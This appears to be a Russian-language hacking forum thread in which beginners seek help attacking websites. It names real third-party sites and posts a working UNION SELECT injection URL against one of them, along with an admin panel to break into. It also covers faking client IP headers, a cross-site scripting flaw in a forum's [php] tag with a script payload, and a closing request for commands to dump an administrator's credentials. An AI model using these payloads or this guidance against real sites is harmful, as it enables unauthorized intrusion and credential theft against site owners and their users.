Да врядли там на эти переменные смотрят x_forwarded_for remote_ip не лохи же они. смотрят только remote_addr обычно...А его подделать трудно.
не лохи же они. Многие так думают, и слава босху Без скрипта выводы делать нельзя, "может быть, наверное" - вот это лоховство. Надо точно знать
2 Doom123: Ну я бы так не сказал. Вот как ты на php, например, определишь, что чел сидит через прокси? Просто взяв $_SERVER['REMOTE_ADDR']? Не всё так сложно, как кажется А если анонимная прокси? А если элитная прокси? А если вообще связка носков по всему миру?
Ты сам понял что сказал? Ты имеешь в виду цепочку прокси? (Или с каждого шелла стучаться на другой сайт - в чём отличие?)
при http://www.site.ru/news/?i=4343' вот это You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10 изменить запрос можно, проверил может криво проверил, просто дальше не получается помогите кто нить, за сайтом в личку
Pashkela я к тому что он сказал "А его подделать трудно." переопределить значение этой переменной не возможно ... например ты не можешь сделать так чтоб там было 0.0.0.0 =) navigat0r читай статьи по скуль иньекции =)
$n@ke, скуля до ORDER BY, смотри запрос: to use near ''4343'' ORDER BY `news_date` DESC,`id` DESC' at line 10 Число 4343, до ORDER BY, а не после.
решил просканировать скуль сканером домены связанные с Голливудом)) (Сам я новичек в поиске уязвимостей, кроме азов). Ну так вот, сканер выдал вот это: http://hollywoodrivierarealestate.com/ (MSSQL Injection) 1.Я не понимаю что и как дальше искать.....Что посоветуете? 2. Нашел админку по адресу http://www.hollywoodwiretap.com/admin/login.php . Что посоветуете делать с ней, чтобы попасть внутрь))
Сканер должен был сказать в каком скрипте инъект! Вот его и крути...по MSSQL Injection читать тут: http://forum.antichat.ru/thread30501.html 2. ввести пароль) Что я нашол беглым осмотром: инклуд Code: http://www.hollywoodwiretap.com/?module=' На сервере включен magic_quotes так как даные слешируются...
NMAP или XSPIDER Но помни, что пока лутший известный сканер - это человеческий мозг. Собери под него базу! (c)Elekt
Скуля тоже есть вывод в тайтле http://www.hollywoodwiretap.com/?module=news&action=page&category=-1+union+select+1,2,table_name,4,5,6+from+information_schema.tables jecka3000, если ты новичок - самое глупое что можно сделать - юзать тупые сканеры. Читай статьи и учись искать уязвимости сам
Слушыл, что если вфоруме есть тег PHP: , то его как то можно использовать. Правдо ли то? Если да, то как его юзать
2Flair Данный баг пашет не везде! Давай разберёмся как он работает: PHP: $row['text'] = str_replace('[php]','<table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d">', $row['text']); $row['text'] = str_replace('[/p*hp]','</td></tr></table><br></font>', $row['text']); То есть [p*hp] заменяется на PHP: <table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Êîä:</font></u></b></left><br><font color="#06499d"> а [/php] на закрытие тегов: PHP: </td></tr></table><br></font> То есть если нет фильтрации, то мы можем вставить свой код! Пример: [p*hp]<script>alert('lol')</script>[/p*hp] В коде это будет выглядеть так: PHP: <table style="border: 1px solid #06499d; padding: 0px;" width="100%"><tr><td align="left" style="padding: 10px 12px"><left><b><u><font color="#06499d">Eia:</font></u></b></left><br><font color="#06499d"><script>alert('lol')</script></td></tr></table><br></font>
Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?